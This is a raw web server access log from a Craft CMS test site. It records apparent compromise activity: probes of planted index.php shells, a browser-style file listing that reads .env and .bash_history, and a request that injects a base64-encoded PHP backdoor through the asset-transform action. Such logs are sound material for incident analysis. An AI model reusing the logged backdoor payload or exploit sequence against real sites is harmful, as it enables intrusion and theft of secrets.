216.73.216.46 - - [21/Aug/2025:12:19:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F.%2Fimages HTTP/2.0" 200 1467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.003 "7810" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F3534f%2F..%2Fimages HTTP/2.0" 200 1469 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.004 "7805" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:52 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Ftemplates%2F..%2F.%2Fvendor HTTP/2.0" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.005 "60232" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:55 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F18a196f3%2F..%2F.gitignore HTTP/2.0" 200 974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 125 0.003 "3238" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fmodules%2F..%2F.gitignore HTTP/2.0" 200 964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "3063" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fimages%2F..%2F3534f%2F3534f HTTP/2.0" 200 1572 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "11589" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:04 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.config%2F..%2F.%2F.bashrc HTTP/2.0" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 79 0.004 "6682" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:07 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F.%2F92d27eb41b.txt HTTP/2.0" 200 19608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "28433" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:10 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F3534f%2F..%2F92d27eb41b.txt HTTP/2.0" 200 19607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "28428" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:13 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Ftemplates%2F..%2F.%2F.env HTTP/2.0" 200 1307 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.003 "3453" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.config%2F..%2F.%2F.bash_history HTTP/2.0" 200 993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 83 0.003 "2926" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:19 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F18a196f3%2F..%2F. HTTP/2.0" 200 2362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.004 "61878" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fpixelandtonic%2F..%2Fparagonie HTTP/2.0" 200 1404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "6763" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:25 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Forder%2Ffiles%2Ffiles%2F. HTTP/2.0" 200 1500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "9360" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fmodules%2F..%2F. HTTP/2.0" 200 1743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "20525" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:31 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2Fcpresources%2Fc57df74c%2F. HTTP/2.0" 200 1491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "8067" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:20:34 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F7196177a%2F..%2F203937da HTTP/2.0" 200 1536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.003 "9582" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:20:58 -0400] "GET /70f7c/70f7c/70f7c/index.php?ARRAY=7o2230223n313735353739363835372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739333235372q3537323030393931353232616139626531666462613732626233303331643233222p2232223n226230363365656130356664336564623166326433633162613764383262343933222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p2262696r675s70617373223n2231382q33392q35382q36342q37392q38342q3232227q HTTP/2.0" 200 305 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 622 0.923 "911" "0.923" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:21:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Ff7c78%2F.. HTTP/2.0" 200 1517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 358 0.004 "10674" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:21:08 -0400] "GET /1cefc/1cefc/1cefc/index.php?of=1 HTTP/2.0" 200 1994 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/80.0.1055.1 Safari/535.24" "62.164.177.242" 291 0.001 "5188" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:21:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F70f7c%2F70f7c HTTP/2.0" 200 1528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 120 0.003 "10565" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:21:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F70f7c%2F70f7c HTTP/2.0" 200 1528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 355 0.004 "10564" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:22:05 -0400] "GET /assets/libs/font-awesome/fonts/fonts/index.php?ARRAY=7o2230223n313735353739363932342p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739333332342q3661643036376365646230303064323139656636633036636336376638663534222p2232223n223162303432663964373033333566663637343964343338316664636163333831222p2233223n223330383332396133393332633765343031373463343963326233323930333265222p2262696r675s70617373223n2233302q33322q35382q36382q37392q38342q3130227q HTTP/2.0" 200 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" "62.164.177.242" 632 0.994 "1025" "0.994" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:22:55 -0400] "GET /cpresources/a091a247/a091a247/index.php?of=1 HTTP/2.0" 200 2342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.35" "62.164.177.242" 304 0.008 "6127" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:22:59 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_350x82_crop_center-center_none/_350x82_crop_center-center_none/index.php?of=1 HTTP/2.0" 200 2284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 386 0.003 "5878" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:23:14 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_68x16_crop_center-center_none/_68x16_crop_center-center_none/index.php?of=1 HTTP/2.0" 200 1983 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_2_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 384 0.007 "5181" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:24:13 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F70f7c%2F.. HTTP/2.0" 200 2130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 354 0.009 "38011" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:24:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Ff7c78%2F.htaccess HTTP/2.0" 200 1061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 362 0.004 "3581" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:24:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Ff7c78%2Findex.php HTTP/2.0" 200 2024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 128 0.003 "5930" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:25:25 -0400] "GET /assets/libs/font-awesome/css/css/index.php?of=1 HTTP/2.0" 200 2290 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 322 0.007 "5824" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:25:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F70f7c%2Findex.php HTTP/2.0" 200 5154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 358 0.010 "26823" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:25:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F70f7c%2Findex.php HTTP/2.0" 200 5158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 358 0.008 "26824" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:25:52 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F70f7c%2F.. HTTP/2.0" 200 2129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 353 0.008 "38012" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:25:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78%2F..%2Findex.php HTTP/2.0" 200 18486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 358 0.005 "69002" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:25:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78%2F..%2F.. HTTP/2.0" 200 2129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 353 0.004 "38014" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:26:28 -0400] "GET /cpresources/6df6f5d8/6df6f5d8/index.php?ARRAY=7o2230223n313735353739373138372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739333538372q3131373237353539646130653765616338316536656161303238313134346639222p2232223n223031346663386163613765343933656137356231366430653863396262626332222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p2262696r675s70617373223n2232322q33362q35312q36322q37342q38322q3239227q HTTP/2.0" 200 307 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0" "62.164.177.242" 506 0.948 "975" "0.948" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:27:01 -0400] "GET /images/images/images/index.php?of=1 HTTP/2.0" 200 2010 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3780 Safari/537.36 Edg/75.0.139" "62.164.177.242" 305 0.007 "5295" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:27:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78%2F..%2Findexx1.php HTTP/2.0" 200 1715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 361 0.005 "5512" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:27:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78%2F..%2Ff7c78 HTTP/2.0" 200 1496 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 355 0.005 "9434" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:27:24 -0400] "GET /assets/js/js/index.php?of=1 HTTP/2.0" 200 2272 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0" "62.164.177.242" 260 0.007 "5976" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:28:00 -0400] "GET /70f7c/70f7c/70f7c/index.php?of=1 HTTP/2.0" 200 2289 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_1_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 314 0.008 "6081" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:28:41 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage%2Fbackups%2F. HTTP/2.0" 200 1565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 345 0.009 "10694" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:28:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Ff7c78%2F. HTTP/2.0" 200 1580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 122 0.004 "11916" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:29:29 -0400] "GET /order/files/2023-01/2023-01/2023-01/index.php?of=1 HTTP/2.0" 200 2110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761" "62.164.177.242" 318 0.007 "5479" "0.006" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:29:33 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 394 0.561 "0" "0.561" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:29:34 -0400] "GET /shop/products HTTP/2.0" 200 6699 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 405 0.590 "74727" "0.590" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:29:39 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 617 0.413 "0" "0.413" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:29:39 -0400] "GET /shop/products HTTP/2.0" 200 6700 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 691 0.606 "74727" "0.607" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:29:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F70f7c%2F. HTTP/2.0" 200 1468 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 353 0.004 "8242" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:29:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F70f7c%2F. HTTP/2.0" 200 1467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 353 0.004 "8243" "0.003" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:29:55 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174748 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 1249 0.419 "174748" "0.419" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:29:57 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "2a0b:4141:820:88d::2" 759 0.467 "0" "0.467" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:30:20 -0400] "GET /?ARRAY=7o2230223n313735353739373431382p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739333831382q3439373837333936386430373532356434326635623930326462626436306236222p2232223n223534313835386363633734306464336661653633386637643039343464383561222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2231352q34352q35332q36342q37372q38362q3135227q HTTP/2.0" 200 19 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:73.0) Gecko/20100101 Firefox/73.0" "62.164.177.242" 598 1.068 "15" "1.068" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:30:26 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 1107 0.480 "0" "0.480" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:30:27 -0400] "GET /admin/login HTTP/2.0" 200 16965 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 1275 0.491 "59176" "0.492" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:30:30 -0400] "GET /cpresources/a091a247/a091a247/index.php?of=1 HTTP/2.0" 200 2342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" "62.164.177.242" 275 0.003 "6127" "0.003" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:30:33 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 1375 0.456 "157" "0.455" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:30:41 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2853.55 Safari/537.36" "2a0b:4141:820:88d::2" 977 0.001 "859" "0.001" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:31:00 -0400] "GET /assets/css/.sass-cache/.sass-cache/index.php?of=1 HTTP/2.0" 200 2137 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3980 Safari/537.36 Edg/80.0.145.1" "62.164.177.242" 191 0.008 "5586" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:31:07 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Ff7c78%2FrWIsghi.png HTTP/2.0" 200 3195 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 366 0.006 "9343" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:31:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78%2F..%2F. HTTP/2.0" 200 1527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "10515" "0.004" "test.newsite.space"
